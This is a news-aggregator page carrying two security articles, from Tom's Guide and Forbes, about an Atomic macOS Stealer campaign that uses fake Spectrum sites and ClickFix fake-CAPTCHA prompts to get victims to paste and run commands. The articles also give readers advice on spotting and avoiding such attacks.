Latest news with #KoushikPal
Tom's Guide
10-06-2025
- Tom's Guide
Macs under threat from new malware campaign impersonating major ISP — how to stay safe
Even though people often think Macs are safe from malware, that definitely isn't true. Case in point, a new Atomic Stealer campaign which is being used to infect the best MacBooks and other Apple computers with info-stealing malware has been spotted online. As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK and it's believed to be the work of Russian hackers due to comments in the malware's source code. What makes this campaign particularly interesting is the fact that in addition to typosquatting, it also uses social engineering to trick unsuspecting Mac users into falling for it. For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains in order to lay traps for potential victims who mistype a popular site's URL into their browser's address bar. While they might think they're on a popular company's website, instead, they're actually on a fake site designed to mimic the real one which is also used to spread dangerous malware. Once infected with Atomic Stealer, the malware can steal personal and sensitive data from your Mac like passwords stored in your Apple Keychain, browser cookies, login credentials, credit card details and more. Here's everything you need to know about this new malware campaign along with some tips and tricks to prevent you from falling victim to it and other cyberattacks. According to CloudSek, the hackers behind this new campaign are impersonating the U.S. internet and cable provider Spectrum using a number of different fake sites. While Spectrum's official website can be found at spectrum[.]com, in its blog post, the firm highlights one of these fake sites which uses the URL panel-spectrum[.]net. Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren't bots. Since many sites use this or similar forms of verification, many people might not even think twice when asked to check a box to prove they're human. However, on the fake site shared by CloudSek, once verification fails, potential victims are then asked to complete an alternative verification instead. Get instant access to breaking news, the hottest reviews, great deals and helpful tips. However, when someone clicks on the button that reads 'Alternative Verification', a command is copied to their clipboard without their knowledge. A set of instructions appears that asks them to open a command prompt, paste the code that was copied to their clipboard and to hit 'Enter' to run it on Windows. If someone is using a Mac though, slightly different instructions are shown that lead to the same outcome, they're computer being infected with info-stealing malware. On Macs, a malicious shell script is used to steal system passwords and download a variant of the Atomic Stealer malware. As CloudSek security researcher Koushik Pal points out in the company's report, the script 'uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.' Given that hackers use all kinds of different tricks to lead potential victims to fake sites spreading malware, it's always best to type a company's website into your browser's address bar manually. However, you should also double check that you spelled it correctly. If you don't know a company's official site, you can use a search engine to find it. One thing though that you want to be careful about is that you're not clicking the first link that you see. The reason being is that Google and on other search engines, the links at the top are often ads while finding a company's actual website often requires that you scroll a bit further down the page. The problem with clicking on an ad or a sponsored search result is that cybercriminals often use malicious ads to take users to fake sites instead of to a company's actual site as anyone (even hackers) can buy ad space online. From here, it's a matter of knowing how to identify a ClickFix attack. Many sites ask that you complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window and paste something from your clipboard there before hitting 'enter', this is a major red flag. A legitimate company might ask you to select all of the images that are cars but they would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else. Although your Mac does come with built-in security software in the form of Apple's own XProtect, it's still a good idea to consider investing in one of the best Mac antivirus software solutions. Unlike free antivirus software, these paid options are updated more frequently and are more likely to spot and help you avoid newer malware strains like Atomic Stealer. Given that attacks using this ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they're not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these sorts of threats so that you can spot any red flags before your Mac or PC becomes infected with malware.
Forbes
08-06-2025
- Forbes
New Apple Passwords Attack Confirmed — What You Need To Know
New macOS password attack hits Apples users. Although it is far more commonplace to read about password attacks against users of the Windows operating system, or targeting services such as Gmail, the truth of the matter is that nobody is safe from the credential-theft threat as this newly confirmed Apple password-stealing attack illustrates. Here's what you need to know about the AMOS campaign targeting macOS users. The latest adversary intelligence report from Koushik Pal, a threat researcher at CloudSEK, has warned users that a newly identified Atomic macOS stealer campaign utilizing a previously unknown variant has been observed targeting the Apple operating system. Although this latest and ongoing threat leverages well-known existing tactics and techniques, such as the Clickfix fake CAPTCHA screen and multi-platform social engineering, the danger it poses to macOS users remains high nonetheless. Better known as AMOS, this latest variant of the Atomic macOS Stealer has been observed using Clickfix attack sites that impersonate a U.S. support services company within the cable TV, internet provision, mobile phone, and managed services sectors. The brand impersonation in this case is made possible by way of typo-squatting domains that appear similar to the genuine article. 'The macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,' Pal warned. This script then uses native macOS commands to 'harvest credentials, bypass security mechanisms, and execute malicious binaries.' This is, to be fair, as significant a threat to your Apple passwords as you are going to get. Targeting both consumer and corporate users, and highlighting a trend in such multi-platform social engineering attacks, Pal said that source code comments suggested that Russian-speaking cybercriminals are behind the new AMOS threat campaign. The AMOS malware utilises legitimate utilities to circumvent endpoint security controls and extract macOS user passwords, which can then be used for lateral movement or sold to initial access brokers for use in other cybercriminal campaigns, including ransomware attacks. Users should be educated about the tactics used by such Apple passwords-stealing campaigns, Pal recommended by way of mitigation, 'especially those disguised as system verification prompts.'
